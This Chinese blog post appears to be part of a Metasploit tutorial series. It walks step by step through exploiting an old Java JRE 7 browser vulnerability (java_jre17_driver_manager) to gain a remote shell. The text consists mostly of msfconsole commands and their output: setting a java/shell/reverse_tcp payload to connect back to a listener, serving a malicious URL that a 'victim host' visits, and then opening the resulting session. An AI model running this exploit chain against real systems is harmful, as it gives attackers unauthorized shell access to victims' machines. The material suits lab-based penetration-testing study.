Metasploit实例-java漏洞(八)

1.1.1 基于java漏洞获取shell

1.1.1.1 生成攻击链接

msf6 > search jre17

图片[1]|Metasploit实例-java漏洞(八)|leon的博客

msf6 > use exploit/multi/browser/java_jre17_driver_manager
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > set payload java/shell/reverse_tcp
payload => java/shell/reverse_tcp
msf6 exploit(multi/browser/java_jre17_driver_manager) > set LHOST 192.168.10.180
LHOST => 192.168.10.180
msf6 exploit(multi/browser/java_jre17_driver_manager) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/browser/java_jre17_driver_manager) > exploit  # 会自动在后台运行
[*] Exploit running as background job 5.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.10.180:4444
[*] Using URL: http://192.168.10.180:8080/efJCThfUK2
[*] Server started.

1.1.1.2 被害主机访问网址

图片[2]|Metasploit实例-java漏洞(八)|leon的博客

图片[3]|Metasploit实例-java漏洞(八)|leon的博客

1.1.1.3 查看获取shell

图片[4]|Metasploit实例-java漏洞(八)|leon的博客

msf6 exploit(multi/browser/java_jre17_driver_manager) > sessions

图片[5]|Metasploit实例-java漏洞(八)|leon的博客

msf6 exploit(multi/browser/java_jre17_driver_manager) > sessions -i 8

图片[6]|Metasploit实例-java漏洞(八)|leon的博客

温馨提示:本文最后更新于2022-12-20 20:57:31,已超过483天没有更新。某些文章具有时效性,若文章内容或图片资源有错误或已失效,请联系站长。谢谢!
转载请注明本文链接:https://blog.leonshadow.cn/763482/3023.html
© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享